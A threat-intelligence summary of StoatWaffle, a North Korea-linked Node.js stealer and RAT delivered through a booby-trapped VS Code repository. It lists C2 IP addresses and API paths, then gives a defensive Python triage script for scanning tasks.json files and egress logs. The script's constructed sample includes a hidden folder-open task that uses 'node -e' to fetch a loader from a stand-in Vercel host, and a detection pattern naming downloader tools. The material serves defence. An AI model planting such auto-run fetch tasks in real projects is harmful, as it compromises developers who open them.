About the StoatWaffle malware used by WaterPlum

2026-03-17 NTTSecurity About the StoatWaffle malware used by WaterPlum

https://jp.security.ntt/insights_resources/tech_blog/stoatwaffle_malware/


NTT Security Japan analyzed StoatWaffle, a newly observed Node.js malware used by WaterPlum Team 8 in the North Korea-linked Contagious Interview campaign. The lure is a blockchain-themed malicious VS Code repository: its tasks.json is configured to run automatically when the folder is opened, and that task downloads code from a Vercel-hosted application and stages additional Node.js downloaders. StoatWaffle polls C2 paths such as /api/errorMessage and /api/handleErrors before loading its stealer and RAT modules. The stealer targets browser credentials, browser-extension data, macOS Keychain data, installed-software details, and Windows user data reachable from WSL; the RAT receives commands from /api/hsocketNext and returns results to /api/hsocketResult. The report lists C2 infrastructure including 185.163.125.196, 147.124.202.208, 163.245.194.216, 66.235.168.136, and 87.236.177.9.

Indicators of Compromise

Type   Value            First Seen   Last Seen
IPv4   185.163.125.196  2026-03-17   2026-03-17
IPv4   147.124.202.208  2026-02-24   2026-03-17
IPv4   163.245.194.216  2026-02-24   2026-03-17
IPv4   66.235.168.136   2026-02-24   2026-03-17
IPv4   87.236.177.9     2026-01-23   2026-03-17
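
The delivery chain and the indicators above, worked as a triage script. This is an added example written for this summary, not code from NTT Security Japan's report or from the malware itself. It parses a .vscode/tasks.json (VS Code reads it as JSONC, so a naive comment stripper would delete the "https://" inside the very URL you want to see), flags tasks that fire on folder open and fetch or execute remote code or name a reported C2 address, and matches egress log lines against the report's C2 addresses and URL paths. The sample tasks.json, the log line format, the example-loader.vercel.app hostname and the 203.0.113.10 address are assumptions constructed for the example; only the IPs and /api/ paths come from the report.

```python
"""StoatWaffle delivery-chain triage. Added example; not code from NTT Security Japan's report."""
import json
import re
# Indicators from the report; every other value in this file is constructed.
IOC_IPS = {"185.163.125.196", "147.124.202.208", "163.245.194.216", "66.235.168.136", "87.236.177.9"}
IOC_PATHS = {"/api/errorMessage", "/api/handleErrors", "/api/hsocketNext", "/api/hsocketResult"}
# Download-and-execute primitives a task that fires on folder open has no business using.
SUSPICIOUS = re.compile(
    r"\b(?:curl|wget|iwr|Invoke-WebRequest)\b|\bnode\s+-e\b|\beval\(|https?://|\.vercel\.app", re.I)
LOG_RE = re.compile(r"dst=(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)")


def strip_jsonc(text: str) -> str:
    """Remove JSONC comments and trailing commas, but only outside string literals,
    so a URL such as https://... inside a task command survives."""
    out, i, in_str = [], 0, False
    while i < len(text):
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\":                           # copy the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):              # the terminating newline is kept
            end = text.find("\n", i)
            i = (len(text) if end < 0 else end) - 1
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = len(text) if end < 0 else end + 1
        elif c == "," and text[i + 1:].lstrip(" \t\r\n")[:1] in ("}", "]"):
            pass                                    # trailing comma: drop it
        else:
            out.append(c)
        i += 1
    return "".join(out)


def task_command_text(task: dict) -> str:
    """Flatten command + args (strings or {"value": ...} objects) across the task and
    its windows/linux/osx overrides into one searchable string."""
    scopes = [task] + [task.get(p) or {} for p in ("windows", "linux", "osx")]
    items = [s.get("command") for s in scopes] + [a for s in scopes for a in s.get("args") or []]
    return " ".join(str(v.get("value", "")) if isinstance(v, dict) else str(v) for v in items if v)


def scan_tasks_json(text: str) -> list[dict]:
    """Findings for tasks that auto-run on folder open, fetch code, or name a reported C2 address."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        cmd = task_command_text(task)
        ip_hits = sorted(ip for ip in IOC_IPS if ip in cmd)
        reasons = []
        if run_on == "folderOpen":
            reasons.append("auto-runs on folder open (runOptions.runOn=folderOpen)")
        if SUSPICIOUS.search(cmd):
            reasons.append("fetches a remote URL or invokes a downloader/interpreter")
        if ip_hits:
            reasons.append("references reported C2 address(es): " + ", ".join(ip_hits))
        if reasons:
            # Auto-run plus a fetch, or any reported C2 address, is high; anything else is review.
            high = bool(ip_hits) or (run_on == "folderOpen" and len(reasons) > 1)
            findings.append({"label": task.get("label", "<unlabelled>"), "command": cmd,
                             "severity": "high" if high else "review", "reasons": reasons})
    return findings


def match_c2_traffic(lines) -> list[dict]:
    """Match egress log lines (constructed '... dst=ip:port METHOD path ...' format) against the
    reported C2 addresses and paths; a path hit on an unlisted host is still returned."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            dst, path = m.group("dst"), m.group("path").split("?", 1)[0]
            ip_match, path_match = dst in IOC_IPS, path in IOC_PATHS
            if ip_match or path_match:
                hits.append({"dst": dst, "method": m.group("method"), "path": path,
                             "ip_match": ip_match, "path_match": path_match})
    return hits


# Constructed sample tasks.json in the shape the report describes: a benign build task plus a
# hidden folderOpen task that pulls a loader from a hypothetical Vercel-hosted application.
SAMPLE_TASKS_JSON = r'''{  // constructed sample, not the actual malicious repository
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build",},
    {"label": "prepare-env", "type": "shell", "command": "node",
     "args": ["-e", "require('https').get('https://example-loader.vercel.app/init', r => r.pipe(process.stdout))"],
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"}}
  ]
}'''
SAMPLE_LOG_LINES = [
    "2026-03-02T09:14:07Z src=10.0.0.5 dst=147.124.202.208:443 GET /api/errorMessage 200",
    "2026-03-02T09:14:09Z src=10.0.0.5 dst=147.124.202.208:443 POST /api/hsocketResult 200",
    "2026-03-02T09:15:00Z src=10.0.0.5 dst=203.0.113.10:443 GET /api/status 200",
    "2026-03-02T09:16:31Z src=10.0.0.7 dst=203.0.113.10:80 GET /api/handleErrors?id=7 404",
]
```

Running scan_tasks_json(SAMPLE_TASKS_JSON) flags only "prepare-env" as high (auto-run plus a remote fetch), while match_c2_traffic(SAMPLE_LOG_LINES) returns the two connections to 147.124.202.208 and the /api/handleErrors request to the unlisted host. Check a cloned repository's .vscode/tasks.json this way before opening the folder in VS Code: a folderOpen task only executes once the workspace is trusted, so the lure has to talk the target past the trust prompt. The path match is deliberately independent of the address match, because the /api/ paths will outlive any one of the five addresses in the table.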
